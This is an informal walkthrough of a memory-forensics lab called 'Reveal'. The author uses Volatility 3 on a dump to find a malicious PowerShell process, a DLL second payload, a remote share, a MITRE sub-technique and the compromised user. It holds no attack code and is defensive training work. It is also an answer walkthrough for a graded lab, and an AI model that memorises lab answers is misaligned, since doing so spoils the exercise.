
Reveal Lab
Endpoint Forensics Lab
First Of All to Answer This Endpoint Forensics Machine We looking for The Ps-List to determine what happened here BTW so after installing Volatility 3 From this Repository https://github.com/volatilityfoundation/volatility3 I use "-f " Paremeter and after that i give it the location of the file and use "windows.pstree" to determine the Ps-list and export it and there is the full command

python3 vol.py -f /home/kimo/Desktop/192-Reveal.dmp windows.pstree > /home/kimo/Desktop/Reveal.txt
1- To identify The Malicious Process I dived into the file and here we go from the PPID and the Name of the process i fell it is "4120" the process Id Which Mean it`s new Process Created and Secondly The most popular script Runner "Powershell.exe" and in the command i found IP and toke it to Virus total to identify it and Simply It`s Malicious



2- In This Question It Simply Asked For the PPID which is determined from the Previous Question


3- The Filename Used by the Malware to execute the second payload Still in the same Line and it`s dll file because we Communicate With Powershell every Small info Will lead you to the important info btw

4- We stillI in the same command and the shared Folder simply it will be after the Ip the Malware communicated With (:

5- He Want here the Sub Mitre Id So what the Main technique used here it`s Defense Evasion and after that the sub stage Payload used a dll file to execute so here we go


6- To determine the username i used Volatility again but with User assist plugin and determine the username Easily Uncle Elon was Comprised i think the attacker send him a mail to win iPhone 16 (:


7- Here I used Threat Fox to determine the name

Thanks for reading (:
Last updated